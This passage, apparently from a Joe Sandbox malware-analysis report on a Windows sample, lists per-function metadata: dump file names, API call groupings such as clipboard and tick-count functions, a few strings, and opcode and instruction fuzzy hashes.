
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$Close$ClipboardCreateErrorGlobalHandleLastMessageMutexPeekProcessThreadUnlockWindow
                            • String ID:
                            • API String ID: 4284707085-0
                            • Opcode ID: b4873df13cb317e9f7b85176b197c5155c26bd37753a97ee1f5c57f8f858808e
                            • Instruction ID: 14cabf51d64cc97ca339fb7776e15010acd9ca542f70fc6da3cec6a5cdabcea9
                            • Opcode Fuzzy Hash: b4873df13cb317e9f7b85176b197c5155c26bd37753a97ee1f5c57f8f858808e
                            • Instruction Fuzzy Hash: 2C816F32605B4086FB6B8B27E8947EA37A1F74DBE4F540116EB5947AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$Close$ClipboardCreateErrorGlobalHandleLastMessageMutexPeekProcessThreadUnlockWindow
                            • String ID:
                            • API String ID: 4284707085-0
                            • Opcode ID: 8c19bc278d7dff4d864a124e17aeaaeec6cca093cc513ef1fa12be45eab97061
                            • Instruction ID: a7055b76a897c83dc388eca8623ee82bb08526d01c776ebc76d6326a671c631b
                            • Opcode Fuzzy Hash: 8c19bc278d7dff4d864a124e17aeaaeec6cca093cc513ef1fa12be45eab97061
                            • Instruction Fuzzy Hash: A4816F32605B4086FB6B8B27E8947EA37A1F74DBE4F540116EB5947AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 9db17cfc029a1d9e455f62c7162e2f0e37d34ba8bc73450ec7a1a60edd1777d7
                            • Instruction ID: 20a4d9a77831b4051384fc8f598b355a3d8bbcaf9ffa1d3d018c2b1f6fbfd02e
                            • Opcode Fuzzy Hash: 9db17cfc029a1d9e455f62c7162e2f0e37d34ba8bc73450ec7a1a60edd1777d7
                            • Instruction Fuzzy Hash: A6816132605B4086FB6B8B27E8847EA77A1F74DBE4F540116EB99476F5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 2cab56a4a519311db7c61c73b245d214bc64a600d3dc5e231742c3ef771d6dd7
                            • Instruction ID: e3e2c6f410881c48b301771b73636cffdad32ec2a4b1032f737b5e02fa8f4c3d
                            • Opcode Fuzzy Hash: 2cab56a4a519311db7c61c73b245d214bc64a600d3dc5e231742c3ef771d6dd7
                            • Instruction Fuzzy Hash: BB816F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 57e1c047e5c44e4425460a1b8dbbf41da31fd1af2930cb6ffce9a84bdccad04c
                            • Instruction ID: b0e548cd495171c6ca5094691b6b95767a7dc720f30d04e99c7db22c2eb9a034
                            • Opcode Fuzzy Hash: 57e1c047e5c44e4425460a1b8dbbf41da31fd1af2930cb6ffce9a84bdccad04c
                            • Instruction Fuzzy Hash: 65816F32605B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$Message$ClipboardCloseGlobalPeekPostUnlock
                            • String ID:
                            • API String ID: 2416748954-0
                            • Opcode ID: 470618b3187763793301ddd5f54f17b9c5cde879357a5bf722641e26f6cdd791
                            • Instruction ID: 827f9a73b1c3767e86ac2efcaef49972a217e36356066d334de93e4c410f49a2
                            • Opcode Fuzzy Hash: 470618b3187763793301ddd5f54f17b9c5cde879357a5bf722641e26f6cdd791
                            • Instruction Fuzzy Hash: C0816F32605B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: a90410ff8d39cf80ff69b6734ce75fef65acd44867dfaa717b3925790bf672d2
                            • Instruction ID: d9d9c16f61d61aaaa84c8dc6fee8d184c7f9762826055b3f28ef1abfb9efc621
                            • Opcode Fuzzy Hash: a90410ff8d39cf80ff69b6734ce75fef65acd44867dfaa717b3925790bf672d2
                            • Instruction Fuzzy Hash: CA817F32205B4486FB6B8B27E8947EA37A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: e25067a6fa8cd6921889d85f3618514946d5b3df6d95472a3486f240b717c31c
                            • Instruction ID: 849278b426213ebd2f9a679536a996548d653b38d201c7a53e8337841403b6ab
                            • Opcode Fuzzy Hash: e25067a6fa8cd6921889d85f3618514946d5b3df6d95472a3486f240b717c31c
                            • Instruction Fuzzy Hash: 38817132605B4086FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: c184325b0f37b7686610e3fafaf558c35b3206c8702a367094bd4fefa53ad55f
                            • Instruction ID: 7c4315c5d162bede6514ba8901c129e929458227dcb60f9dd2867e06a9bcd96c
                            • Opcode Fuzzy Hash: c184325b0f37b7686610e3fafaf558c35b3206c8702a367094bd4fefa53ad55f
                            • Instruction Fuzzy Hash: 79817032605B4086FB6B8B27E8947EA77A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 48b87250f5e2e36cc3af9400c15ece38dc7aaa5379fef70e119143aeee17b791
                            • Instruction ID: a6ea11725852d2e0c7fb9417f8327e29c8cf2d56b4dcfaf5d162a97e8c158b86
                            • Opcode Fuzzy Hash: 48b87250f5e2e36cc3af9400c15ece38dc7aaa5379fef70e119143aeee17b791
                            • Instruction Fuzzy Hash: D0817132605B4086FB6B8B27E8947EA77A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 4fe8f721cdd2f73db9450b442155e2993d3a131e671ca4706e5450aa3e3427d6
                            • Instruction ID: 78be7d9febec830ee7ba95c005fa3c5a84720aca12a60700c1bd8fdb57abf835
                            • Opcode Fuzzy Hash: 4fe8f721cdd2f73db9450b442155e2993d3a131e671ca4706e5450aa3e3427d6
                            • Instruction Fuzzy Hash: A1817132605B4086FB6B8B27E8947EA77A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 275b81ef885c79bba315ce0c3309caae845de8fc81a15e3a500320c6e4bbe5df
                            • Instruction ID: dfa7523ab7166bfbfd9b91a4999bd53b5a0d362c5019a04ee368327ba5a32274
                            • Opcode Fuzzy Hash: 275b81ef885c79bba315ce0c3309caae845de8fc81a15e3a500320c6e4bbe5df
                            • Instruction Fuzzy Hash: 64817032605B4086FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 50c6352bd5b426f2a6ca0c866d4913bc776fa15cc85afecb9beef65cd758b17e
                            • Instruction ID: fd39e5ded891d05f87acee001207b8f30576287b4ca076eeb85275ff7f0cbcbe
                            • Opcode Fuzzy Hash: 50c6352bd5b426f2a6ca0c866d4913bc776fa15cc85afecb9beef65cd758b17e
                            • Instruction Fuzzy Hash: 43817032605B4086FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 9c07826b29a573e97f4ed6c2c8655f311e24d0e5d74963b268fad9ded9675fbf
                            • Instruction ID: 6c87ed7a79808b08dcf35e01071656c9443125858a6b5857407770199807a3d9
                            • Opcode Fuzzy Hash: 9c07826b29a573e97f4ed6c2c8655f311e24d0e5d74963b268fad9ded9675fbf
                            • Instruction Fuzzy Hash: 0A716132605B4086FB6B8B27E8947EA37A1F74DBE4F544116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Initialize$CriticalSectionmalloc
                            • String ID: Clipboard$No tray mem$Tray
                            • API String ID: 2052168798-1447848212
                            • Opcode ID: 10de23e86fadf6c847ef25f1bf01291d823d392bc22fa8236b67eaa57190e6e2
                            • Instruction ID: 925009f07ed6017cab7df2bf00feca6bed69065a01af03278a7589db18145faf
                            • Opcode Fuzzy Hash: 10de23e86fadf6c847ef25f1bf01291d823d392bc22fa8236b67eaa57190e6e2
                            • Instruction Fuzzy Hash: CC91D130104B4485FB1B8B57BD81BC9B7E8BB6CB94F58021ADB990BBB1DB79C165C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$free$Message
                            • String ID: call
                            • API String ID: 1247145397-3431870270
                            • Opcode ID: fca46172bf6ca2278eec6aaa60b1695537e1abb3f461214c94fc7f135be27a73
                            • Instruction ID: 49c86c7b959db96a9c8bc3181f26ad41f8f6c6dfeadceea29a8de73cde9402dc
                            • Opcode Fuzzy Hash: fca46172bf6ca2278eec6aaa60b1695537e1abb3f461214c94fc7f135be27a73
                            • Instruction Fuzzy Hash: B3617E72604B808AF726CF66F8403ED77A1F78CB98F544126EB4A47AB9DB34C581CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$free$Message
                            • String ID: call
                            • API String ID: 1247145397-3431870270
                            • Opcode ID: 1a0d1250352621168d7a7ac3eb71bbd26c2c29c609b7ee303e5093b7f09285f7
